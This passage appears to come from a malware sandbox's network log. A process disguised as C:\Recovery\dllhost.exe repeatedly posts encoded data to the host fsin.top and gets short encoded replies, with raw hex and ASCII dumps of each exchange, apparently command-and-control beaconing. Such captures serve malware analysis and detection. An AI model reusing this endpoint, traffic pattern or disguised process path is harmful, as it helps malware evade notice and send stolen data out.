                                                  Aug 1, 2024 07:38:14.043605089 CEST274OUTPOST /javascriptCentraldownloads.php HTTP/1.1
                                                  Content-Type: application/x-www-form-urlencoded
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                  Host: fsin.top
                                                  Content-Length: 1012
                                                  Expect: 100-continue
                                                  Connection: Keep-Alive
                                                  Aug 1, 2024 07:38:14.396508932 CEST1012OUTData Raw: 54 5e 5d 57 5a 5b 58 52 5c 5e 5a 51 54 55 57 56 57 5e 5e 5b 56 5b 51 55 5b 5d 5f 5a 5b 59 5b 55 5c 5d 5e 5c 5a 5e 51 51 5b 53 51 5c 54 51 5e 56 52 5d 5c 57 58 56 58 59 57 58 54 5d 59 59 5c 58 5b 53 5a 58 5f 56 57 50 59 5c 42 5b 43 53 43 5c 55 53
                                                  Data Ascii: T^]WZ[XR\^ZQTUWVW^^[V[QU[]_Z[Y[U\]^\Z^QQ[SQ\TQ^VR]\WXVXYWXT]YY\X[SZX_VWPY\B[CSC\USUWV^]_VQ_Z[VPT[_X]P^BQ_U_T^P]_]\^_QYTQTCX]P^X]TP]US[[YG][X_^XXV\T@^TZE\[GSY]^QDY\][XQ\V[PXZ^P[^ZUSZS^S"_'"-^673%;]<+5=66&825&U7,X3X5_'5&G#.X!(
                                                  Aug 1, 2024 07:38:14.492444038 CEST25INHTTP/1.1 100 Continue
                                                  Aug 1, 2024 07:38:14.736319065 CEST588INHTTP/1.1 200 OK
                                                  Date: Thu, 01 Aug 2024 05:38:14 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: keep-alive
                                                  CF-Cache-Status: DYNAMIC
                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=294PS8mbD%2FOzQGg4n%2BXgDcZAI%2BUB805QiBq%2Bni9xD4QKRRpm4DNmWwR2Yfmax3WHPQ73ybb0Ugvm%2FzzFaqQ9NVIslCRhjpHE1uuKlSZ1cncFi5nq7Apw6QMDGg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                  Server: cloudflare
                                                  CF-RAY: 8ac37b1849ff8c8d-EWR
                                                  alt-svc: h2=":443"; ma=60
                                                  Data Raw: 34 0d 0a 30 57 5b 59 0d 0a 30 0d 0a 0d 0a
                                                  Data Ascii: 40W[Y0


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  67192.168.2.449804172.67.203.2807288C:\Recovery\dllhost.exe
                                                  TimestampBytes transferredDirectionData
                                                  Aug 1, 2024 07:38:14.868654966 CEST274OUTPOST /javascriptCentraldownloads.php HTTP/1.1
                                                  Content-Type: application/x-www-form-urlencoded
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                  Host: fsin.top
                                                  Content-Length: 1012
                                                  Expect: 100-continue
                                                  Connection: Keep-Alive
                                                  Aug 1, 2024 07:38:15.224642038 CEST1012OUTData Raw: 51 50 58 53 5f 59 58 56 5c 5e 5a 51 54 50 57 5a 57 5e 5e 5f 56 5d 51 5e 5b 5d 5f 5a 5b 59 5b 55 5c 5d 5e 5c 5a 5e 51 51 5b 53 51 5c 54 51 5e 56 52 5d 5c 57 58 56 58 59 57 58 54 5d 59 59 5c 58 5b 53 5a 58 5f 56 57 50 59 5c 42 5b 43 53 43 5c 55 53
                                                  Data Ascii: QPXS_YXV\^ZQTPWZW^^_V]Q^[]_Z[Y[U\]^\Z^QQ[SQ\TQ^VR]\WXVXYWXT]YY\X[SZX_VWPY\B[CSC\USUWV^]_VQ_Z[VPT[_X]P^BQ_U_T^P]_]\^_QYTQTCX]P^X]TP]US[[YG][X_^XXV\T@^TZE\[GSY]^QDY\][XQ\V[PXZ^P[^ZUSZS^S"X36 &&'<8=>6"%8?S2?&13$,!( 2%&G#.X!<
                                                  Aug 1, 2024 07:38:15.384660959 CEST25INHTTP/1.1 100 Continue
                                                  Aug 1, 2024 07:38:15.616525888 CEST590INHTTP/1.1 200 OK
                                                  Date: Thu, 01 Aug 2024 05:38:15 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: keep-alive
                                                  CF-Cache-Status: DYNAMIC
                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Sf7Ga2P4to1tzW0I9rXRGjYtupEeivgfxn7XUDz8jBe7yF%2BxEdbb%2Fwfxr7Ce5vgNqTFBVqi%2Fny1AgWOrv3g%2FypowfG6nXi9iw7%2BwwWVsHolQoO0rhhBvOpsd%2Bg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                  Server: cloudflare
                                                  CF-RAY: 8ac37b1dba310f9f-EWR
                                                  alt-svc: h2=":443"; ma=60
                                                  Data Raw: 34 0d 0a 30 57 5b 59 0d 0a 30 0d 0a 0d 0a
                                                  Data Ascii: 40W[Y0


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  68192.168.2.449805172.67.203.2807288C:\Recovery\dllhost.exe
                                                  TimestampBytes transferredDirectionData
                                                  Aug 1, 2024 07:38:15.761842966 CEST274OUTPOST /javascriptCentraldownloads.php HTTP/1.1
                                                  Content-Type: application/x-www-form-urlencoded
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                  Host: fsin.top
                                                  Content-Length: 1012
                                                  Expect: 100-continue
                                                  Connection: Keep-Alive
                                                  Aug 1, 2024 07:38:16.115396023 CEST1012OUTData Raw: 51 54 58 54 5a 54 5d 56 5c 5e 5a 51 54 51 57 52 57 5f 5e 59 56 5a 51 5c 5b 5d 5f 5a 5b 59 5b 55 5c 5d 5e 5c 5a 5e 51 51 5b 53 51 5c 54 51 5e 56 52 5d 5c 57 58 56 58 59 57 58 54 5d 59 59 5c 58 5b 53 5a 58 5f 56 57 50 59 5c 42 5b 43 53 43 5c 55 53
                                                  Data Ascii: QTXTZT]V\^ZQTQWRW_^YVZQ\[]_Z[Y[U\]^\Z^QQ[SQ\TQ^VR]\WXVXYWXT]YY\X[SZX_VWPY\B[CSC\USUWV^]_VQ_Z[VPT[_X]P^BQ_U_T^P]_]\^_QYTQTCX]P^X]TP]US[[YG][X_^XXV\T@^TZE\[GSY]^QDY\][XQ\V[PXZ^P[^ZUSZS^S"Z0"".8Y&%,)+&>69'88%/&Y% (S8.,#+']25&G#.X!
                                                  Aug 1, 2024 07:38:16.233439922 CEST25INHTTP/1.1 100 Continue
                                                  Aug 1, 2024 07:38:16.471631050 CEST590INHTTP/1.1 200 OK
                                                  Date: Thu, 01 Aug 2024 05:38:16 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: keep-alive
                                                  CF-Cache-Status: DYNAMIC
                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2F6goADs9ziJLNzHtyg1hY11Zf%2Fq9aPXvHUVVPRnA0lhbJkP%2FDF7YVAX1MOkRASKR55tmmib8frXKDV%2F4mnEeRNVXgH6x9ipxklPt7HJeTEVd6CKC%2BFBWNDJ%2B6A%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                  Server: cloudflare
                                                  CF-RAY: 8ac37b2328553338-EWR
                                                  alt-svc: h2=":443"; ma=60
                                                  Data Raw: 34 0d 0a 30 57 5b 59 0d 0a 30 0d 0a 0d 0a
                                                  Data Ascii: 40W[Y0


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  69192.168.2.449806172.67.203.2807288C:\Recovery\dllhost.exe
                                                  TimestampBytes transferredDirectionData
                                                  Aug 1, 2024 07:38:16.604471922 CEST274OUTPOST /javascriptCentraldownloads.php HTTP/1.1
                                                  Content-Type: application/x-www-form-urlencoded
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                  Host: fsin.top
                                                  Content-Length: 1012
                                                  Expect: 100-continue
                                                  Connection: Keep-Alive
                                                  Aug 1, 2024 07:38:16.959007978 CEST1012OUTData Raw: 54 50 5d 52 5a 5b 58 54 5c 5e 5a 51 54 53 57 57 57 55 5e 58 56 55 51 55 5b 5d 5f 5a 5b 59 5b 55 5c 5d 5e 5c 5a 5e 51 51 5b 53 51 5c 54 51 5e 56 52 5d 5c 57 58 56 58 59 57 58 54 5d 59 59 5c 58 5b 53 5a 58 5f 56 57 50 59 5c 42 5b 43 53 43 5c 55 53
                                                  Data Ascii: TP]RZ[XT\^ZQTSWWWU^XVUQU[]_Z[Y[U\]^\Z^QQ[SQ\TQ^VR]\WXVXYWXT]YY\X[SZX_VWPY\B[CSC\USUWV^]_VQ_Z[VPT[_X]P^BQ_U_T^P]_]\^_QYTQTCX]P^X]TP]US[[YG][X_^XXV\T@^TZE\[GSY]^QDY\][XQ\V[PXZ^P[^ZUSZS^S!$!\58]3%(+T**^'(+&,!$3,V8-8!; %5&G#.X!0
                                                  Aug 1, 2024 07:38:17.102906942 CEST25INHTTP/1.1 100 Continue
                                                  Aug 1, 2024 07:38:17.360004902 CEST582INHTTP/1.1 200 OK
                                                  Date: Thu, 01 Aug 2024 05:38:17 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: keep-alive
                                                  CF-Cache-Status: DYNAMIC
                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hYBsAflUaaK0pcZZ3p84aPGf74vCDPRZvJv0BvnnUTJE62rJjZBzEQibToivHQuxzVxAK9ywduAWi%2FfWSt%2FiEw9nuNQqPR8GnBWchru3u9Um0vv30ihpmmDJsA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                  Server: cloudflare
                                                  CF-RAY: 8ac37b289ecd8c09-EWR
                                                  alt-svc: h2=":443"; ma=60
                                                  Data Raw: 34 0d 0a 30 57 5b 59 0d 0a 30 0d 0a 0d 0a
                                                  Data Ascii: 40W[Y0


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  70192.168.2.449807172.67.203.2807288C:\Recovery\dllhost.exe
                                                  TimestampBytes transferredDirectionData
                                                  Aug 1, 2024 07:38:17.518357038 CEST274OUTPOST /javascriptCentraldownloads.php HTTP/1.1
                                                  Content-Type: application/x-www-form-urlencoded
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                  Host: fsin.top
                                                  Content-Length: 1012
                                                  Expect: 100-continue
                                                  Connection: Keep-Alive
                                                  Aug 1, 2024 07:38:17.865236998 CEST1012OUTData Raw: 51 55 5d 56 5a 5f 58 53 5c 5e 5a 51 54 5f 57 55 57 5e 5e 5b 56 58 51 55 5b 5d 5f 5a 5b 59 5b 55 5c 5d 5e 5c 5a 5e 51 51 5b 53 51 5c 54 51 5e 56 52 5d 5c 57 58 56 58 59 57 58 54 5d 59 59 5c 58 5b 53 5a 58 5f 56 57 50 59 5c 42 5b 43 53 43 5c 55 53
                                                  Data Ascii: QU]VZ_XS\^ZQT_WUW^^[VXQU[]_Z[Y[U\]^\Z^QQ[SQ\TQ^VR]\WXVXYWXT]YY\X[SZX_VWPY\B[CSC\USUWV^]_VQ_Z[VPT[_X]P^BQ_U_T^P]_]\^_QYTQTCX]P^X]TP]US[[YG][X_^XXV\T@^TZE\[GSY]^QDY\][XQ\V[PXZ^P[^ZUSZS^S!3Z![$$6#_<(!=%&2#R11%#,/=85;;\1&G#.X!


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  71192.168.2.449808172.67.203.2807288C:\Recovery\dllhost.exe
                                                  TimestampBytes transferredDirectionData
                                                  Aug 1, 2024 07:38:17.903141022 CEST274OUTPOST /javascriptCentraldownloads.php HTTP/1.1
                                                  Content-Type: application/x-www-form-urlencoded
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                  Host: fsin.top
                                                  Content-Length: 1284
                                                  Expect: 100-continue
                                                  Connection: Keep-Alive
                                                  Aug 1, 2024 07:38:18.256093025 CEST1284OUTData Raw: 54 53 5d 50 5a 58 58 54 5c 5e 5a 51 54 5f 57 53 57 52 5e 5b 56 54 51 55 5b 5d 5f 5a 5b 59 5b 55 5c 5d 5e 5c 5a 5e 51 51 5b 53 51 5c 54 51 5e 56 52 5d 5c 57 58 56 58 59 57 58 54 5d 59 59 5c 58 5b 53 5a 58 5f 56 57 50 59 5c 42 5b 43 53 43 5c 55 53
                                                  Data Ascii: TS]PZXXT\^ZQT_WSWR^[VTQU[]_Z[Y[U\]^\Z^QQ[SQ\TQ^VR]\WXVXYWXT]YY\X[SZX_VWPY\B[CSC\USUWV^]_VQ_Z[VPT[_X]P^BQ_U_T^P]_]\^_QYTQTCX]P^X]TP]US[[YG][X_^XXV\T@^TZE\[GSY]^QDY\][XQ\V[PXZ^P[^ZUSZS^S!0")6 ]0^(;.V*5"Y'8%?"2U#/X8"8+X'5&G#.X!
                                                  Aug 1, 2024 07:38:18.354029894 CEST25INHTTP/1.1 100 Continue
                                                  Aug 1, 2024 07:38:18.532893896 CEST732INHTTP/1.1 200 OK
                                                  Date: Thu, 01 Aug 2024 05:38:18 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: keep-alive
                                                  CF-Cache-Status: DYNAMIC
                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wsbacJ5t3AoRyNgkk1vidZiJ3AMlNNMaCNpYNyvkKd%2F%2Ft5C125hWyoW69EBRQsCk19rzHV9wCNK6egaGIqkVztoOSaoRl%2FhyH2yZYoH%2BRwApE8OB2O6yX%2Fv7mA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                  Server: cloudflare
                                                  CF-RAY: 8ac37b306fed42de-EWR
                                                  alt-svc: h2=":443"; ma=60
                                                  Data Raw: 39 38 0d 0a 02 1f 22 1c 30 5e 21 09 22 2a 30 53 3e 31 21 52 29 23 09 04 3c 5f 24 04 26 12 3a 06 26 5e 24 55 36 05 39 13 24 06 32 50 32 22 00 1d 29 0d 21 51 04 11 26 5e 34 23 26 5f 3d 07 27 1f 30 01 33 5b 22 25 3f 05 26 33 3e 0e 35 3a 20 5c 29 32 1b 5c 3c 22 0e 0a 3a 28 2b 5c 3f 30 3b 02 25 36 2a 56 0d 17 22 54 39 38 16 1e 27 1c 0d 0c 34 02 2f 56 37 15 2d 5a 3d 2c 31 04 2a 34 31 07 2e 1d 2f 5f 29 1d 00 51 3c 03 0f 1d 3f 04 3d 52 33 39 22 5d 2c 03 2d 48 0e 3d 59 4d 0d 0a
                                                  Data Ascii: 98"0^!"*0S>1!R)#<_$&:&^$U69$2P2")!Q&^4#&_='03["%?&3>5: \)2\<":(+\?0;%6*V"T98'4/V7-Z=,1*41./_)Q<?=R39"],-H=YM
                                                  Aug 1, 2024 07:38:18.635634899 CEST5INData Raw: 30 0d 0a 0d 0a
                                                  Data Ascii: 0


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  72192.168.2.449809172.67.203.2807288C:\Recovery\dllhost.exe
                                                  TimestampBytes transferredDirectionData
                                                  Aug 1, 2024 07:38:18.025384903 CEST274OUTPOST /javascriptCentraldownloads.php HTTP/1.1
                                                  Content-Type: application/x-www-form-urlencoded
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                  Host: fsin.top
                                                  Content-Length: 1012
                                                  Expect: 100-continue
                                                  Connection: Keep-Alive
                                                  Aug 1, 2024 07:38:18.380831957 CEST1012OUTData Raw: 51 55 58 54 5f 5e 5d 56 5c 5e 5a 51 54 57 57 55 57 50 5e 56 56 5f 51 5c 5b 5d 5f 5a 5b 59 5b 55 5c 5d 5e 5c 5a 5e 51 51 5b 53 51 5c 54 51 5e 56 52 5d 5c 57 58 56 58 59 57 58 54 5d 59 59 5c 58 5b 53 5a 58 5f 56 57 50 59 5c 42 5b 43 53 43 5c 55 53
                                                  Data Ascii: QUXT_^]V\^ZQTWWUWP^VV_Q\[]_Z[Y[U\]^\Z^QQ[SQ\TQ^VR]\WXVXYWXT]YY\X[SZX_VWPY\B[CSC\USUWV^]_VQ_Z[VPT[_X]P^BQ_U_T^P]_]\^_QYTQTCX]P^X]TP]US[[YG][X_^XXV\T@^TZE\[GSY]^QDY\][XQ\V[PXZ^P[^ZUSZS^S!326=?0')(5*&=%;2*%# ,X$!'5&G#.X!
                                                  Aug 1, 2024 07:38:18.541606903 CEST25INHTTP/1.1 100 Continue
                                                  Aug 1, 2024 07:38:18.680062056 CEST584INHTTP/1.1 200 OK
                                                  Date: Thu, 01 Aug 2024 05:38:18 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: keep-alive
                                                  CF-Cache-Status: DYNAMIC
                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hd5JYDiDFoeYwQQCaInujZvh6a9uhMWr6eo810cONunAJtXQCaqJwUSeMnIu%2Fvs3695KcIv3tCh%2Fm8YbcPbDOvTf9iQQmMadKaKSyE1cpenq13%2B5M6ak5t8NzQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                  Server: cloudflare
                                                  CF-RAY: 8ac37b3178a842f5-EWR
                                                  alt-svc: h2=":443"; ma=60
                                                  Data Raw: 34 0d 0a 30 57 5b 59 0d 0a 30 0d 0a 0d 0a
                                                  Data Ascii: 40W[Y0


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  73192.168.2.449810172.67.203.2807288C:\Recovery\dllhost.exe
                                                  TimestampBytes transferredDirectionData
                                                  Aug 1, 2024 07:38:18.831387997 CEST250OUTPOST /javascriptCentraldownloads.php HTTP/1.1
                                                  Content-Type: application/x-www-form-urlencoded
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                  Host: fsin.top
                                                  Content-Length: 1012
                                                  Expect: 100-continue
                                                  Aug 1, 2024 07:38:19.178953886 CEST1012OUTData Raw: 54 55 58 54 5a 5a 58 52 5c 5e 5a 51 54 51 57 54 57 5e 5e 59 56 5a 51 59 5b 5d 5f 5a 5b 59 5b 55 5c 5d 5e 5c 5a 5e 51 51 5b 53 51 5c 54 51 5e 56 52 5d 5c 57 58 56 58 59 57 58 54 5d 59 59 5c 58 5b 53 5a 58 5f 56 57 50 59 5c 42 5b 43 53 43 5c 55 53
                                                  Data Ascii: TUXTZZXR\^ZQTQWTW^^YVZQY[]_Z[Y[U\]^\Z^QQ[SQ\TQ^VR]\WXVXYWXT]YY\X[SZX_VWPY\B[CSC\USUWV^]_VQ_Z[VPT[_X]P^BQ_U_T^P]_]\^_QYTQTCX]P^X]TP]US[[YG][X_^XXV\T@^TZE\[GSY]^QDY\][XQ\V[PXZ^P[^ZUSZS^S!%2_!=,]'5#)+>=18%,.X1 4S8'!8%%&G#.X!
                                                  Aug 1, 2024 07:38:19.273462057 CEST25INHTTP/1.1 100 Continue
                                                  Aug 1, 2024 07:38:19.511104107 CEST594INHTTP/1.1 200 OK
                                                  Date: Thu, 01 Aug 2024 05:38:19 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: keep-alive
                                                  CF-Cache-Status: DYNAMIC
                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7p2z5Xhb%2FpB6k4JZmn%2BgmgXQew4LIDLM7GbghYj%2BQ%2BGToENUQRJEJLjB6%2BL1Anz4UEVWs6c2vTJWMKHcmUAbdveTsltwZ%2BxhOui2iAc2yZ%2BnXsja%2BGHpbfuBYg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                  Server: cloudflare
                                                  CF-RAY: 8ac37b362b2172a4-EWR
                                                  alt-svc: h2=":443"; ma=60
                                                  Data Raw: 34 0d 0a 30 57 5b 59 0d 0a 30 0d 0a 0d 0a
                                                  Data Ascii: 40W[Y0


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  74192.168.2.449811172.67.203.2807288C:\Recovery\dllhost.exe
                                                  TimestampBytes transferredDirectionData
                                                  Aug 1, 2024 07:38:19.634608984 CEST274OUTPOST /javascriptCentraldownloads.php HTTP/1.1
                                                  Content-Type: application/x-www-form-urlencoded
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                  Host: fsin.top
                                                  Content-Length: 1012
                                                  Expect: 100-continue
                                                  Connection: Keep-Alive
                                                  Aug 1, 2024 07:38:19.990483999 CEST1012OUTData Raw: 54 57 58 53 5a 5c 58 5c 5c 5e 5a 51 54 5e 57 52 57 50 5e 5d 56 5b 51 5a 5b 5d 5f 5a 5b 59 5b 55 5c 5d 5e 5c 5a 5e 51 51 5b 53 51 5c 54 51 5e 56 52 5d 5c 57 58 56 58 59 57 58 54 5d 59 59 5c 58 5b 53 5a 58 5f 56 57 50 59 5c 42 5b 43 53 43 5c 55 53
                                                  Data Ascii: TWXSZ\X\\^ZQT^WRWP^]V[QZ[]_Z[Y[U\]^\Z^QQ[SQ\TQ^VR]\WXVXYWXT]YY\X[SZX_VWPY\B[CSC\USUWV^]_VQ_Z[VPT[_X]P^BQ_U_T^P]_]\^_QYTQTCX]P^X]TP]US[[YG][X_^XXV\T@^TZE\[GSY]^QDY\][XQ\V[PXZ^P[^ZUSZS^S"32&"= ]$50(]")&%%8;%Y.Z&3<;>+X"(+25&G#.X!
                                                  Aug 1, 2024 07:38:20.097742081 CEST25INHTTP/1.1 100 Continue
                                                  Aug 1, 2024 07:38:20.251190901 CEST592INHTTP/1.1 200 OK
                                                  Date: Thu, 01 Aug 2024 05:38:20 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: keep-alive
                                                  CF-Cache-Status: DYNAMIC
                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=bE8j2OADf9UcJLQg%2FAn1znQ7LjlcZV8wiTSh4do4rC4TsNV5QNBIJr%2BizWnsx%2F%2FOLWly5OYdm%2F4Qio%2B6Wvcdint0SxgBzGs9Fy7bEYuoXoU2y6VWe4yddYE%2BDA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                  Server: cloudflare
                                                  CF-RAY: 8ac37b3b4b8842ea-EWR
                                                  alt-svc: h2=":443"; ma=60
                                                  Data Raw: 34 0d 0a 30 57 5b 59 0d 0a 30 0d 0a 0d 0a
                                                  Data Ascii: 40W[Y0


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  75192.168.2.449812172.67.203.2807288C:\Recovery\dllhost.exe
                                                  TimestampBytes transferredDirectionData
                                                  Aug 1, 2024 07:38:20.385710955 CEST274OUTPOST /javascriptCentraldownloads.php HTTP/1.1
                                                  Content-Type: application/x-www-form-urlencoded
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                  Host: fsin.top
                                                  Content-Length: 1012
                                                  Expect: 100-continue
                                                  Connection: Keep-Alive
                                                  Aug 1, 2024 07:38:20.740348101 CEST1012OUTData Raw: 54 5e 58 5c 5a 5a 5d 54 5c 5e 5a 51 54 53 57 53 57 52 5e 56 56 5e 51 5b 5b 5d 5f 5a 5b 59 5b 55 5c 5d 5e 5c 5a 5e 51 51 5b 53 51 5c 54 51 5e 56 52 5d 5c 57 58 56 58 59 57 58 54 5d 59 59 5c 58 5b 53 5a 58 5f 56 57 50 59 5c 42 5b 43 53 43 5c 55 53
                                                  Data Ascii: T^X\ZZ]T\^ZQTSWSWR^VV^Q[[]_Z[Y[U\]^\Z^QQ[SQ\TQ^VR]\WXVXYWXT]YY\X[SZX_VWPY\B[CSC\USUWV^]_VQ_Z[VPT[_X]P^BQ_U_T^P]_]\^_QYTQTCX]P^X]TP]US[[YG][X_^XXV\T@^TZE\[GSY]^QDY\][XQ\V[PXZ^P[^ZUSZS^S!%!*" X35 ?&?%%8,2%#,T,6;$%5&G#.X!0
                                                  Aug 1, 2024 07:38:20.859787941 CEST25INHTTP/1.1 100 Continue
                                                  Aug 1, 2024 07:38:21.109611034 CEST580INHTTP/1.1 200 OK
                                                  Date: Thu, 01 Aug 2024 05:38:21 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: keep-alive
                                                  CF-Cache-Status: DYNAMIC
                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=VkwodhTsgglQosEJ22Be16qk6U72SAEwpbGldaTZ8Nv%2F4P2SMpUVuWyknWBw471xrnXAoIHye7CicZHF4m3h50GS4Q0nlqTThV03Djm2zrtpXRKDaBSHG3WgQA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                  Server: cloudflare
                                                  CF-RAY: 8ac37b401a114338-EWR
                                                  alt-svc: h2=":443"; ma=60
                                                  Data Raw: 34 0d 0a 30 57 5b 59 0d 0a 30 0d 0a 0d 0a
                                                  Data Ascii: 40W[Y0


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  76192.168.2.449813172.67.203.2807288C:\Recovery\dllhost.exe
                                                  TimestampBytes transferredDirectionData
                                                  Aug 1, 2024 07:38:21.250936031 CEST274OUTPOST /javascriptCentraldownloads.php HTTP/1.1
                                                  Content-Type: application/x-www-form-urlencoded
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                  Host: fsin.top
                                                  Content-Length: 1008
                                                  Expect: 100-continue
                                                  Connection: Keep-Alive
                                                  Aug 1, 2024 07:38:21.599699020 CEST1008OUTData Raw: 51 50 58 52 5a 5a 58 54 5c 5e 5a 51 54 56 57 55 57 57 5e 59 56 5e 51 59 5b 5d 5f 5a 5b 59 5b 55 5c 5d 5e 5c 5a 5e 51 51 5b 53 51 5c 54 51 5e 56 52 5d 5c 57 58 56 58 59 57 58 54 5d 59 59 5c 58 5b 53 5a 58 5f 56 57 50 59 5c 42 5b 43 53 43 5c 55 53
                                                  Data Ascii: QPXRZZXT\^ZQTVWUWW^YV^QY[]_Z[Y[U\]^\Z^QQ[SQ\TQ^VR]\WXVXYWXT]YY\X[SZX_VWPY\B[CSC\USUWV^]_VQ_Z[VPT[_X]P^BQ_U_T^P]_]\^_QYTQTCX]P^X]TP]US[[YG][X_^XXV\T@^TZE\[GSY]^QDY\][XQ\V[PXZ^P[^ZUSZS^S!02>!-#3%]+(.U*528P%"1#;,68/\&%&G#.X!<
                                                  Aug 1, 2024 07:38:21.695379019 CEST25INHTTP/1.1 100 Continue
                                                  Aug 1, 2024 07:38:21.968524933 CEST586INHTTP/1.1 200 OK
                                                  Date: Thu, 01 Aug 2024 05:38:21 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: keep-alive
                                                  CF-Cache-Status: DYNAMIC
                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=FgbQINb%2BpxqLikPLs3Z2el%2BsiGsAEXmT7IutawtcnaAXL2rBDKEpNSAU8ldCOqGxkweJN17ZCzzdtR6sk4LOdX%2F3C0nP9%2BgJybAmS4xoyJq7EMKsVJcnY6tj9Q%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                  Server: cloudflare
                                                  CF-RAY: 8ac37b455d3f8c89-EWR
                                                  alt-svc: h2=":443"; ma=60
                                                  Data Raw: 34 0d 0a 30 57 5b 59 0d 0a 30 0d 0a 0d 0a
                                                  Data Ascii: 40W[Y0


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  77192.168.2.449814172.67.203.2807288C:\Recovery\dllhost.exe
                                                  TimestampBytes transferredDirectionData
                                                  Aug 1, 2024 07:38:22.103281975 CEST274OUTPOST /javascriptCentraldownloads.php HTTP/1.1
                                                  Content-Type: application/x-www-form-urlencoded
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                  Host: fsin.top
                                                  Content-Length: 1012
                                                  Expect: 100-continue
                                                  Connection: Keep-Alive
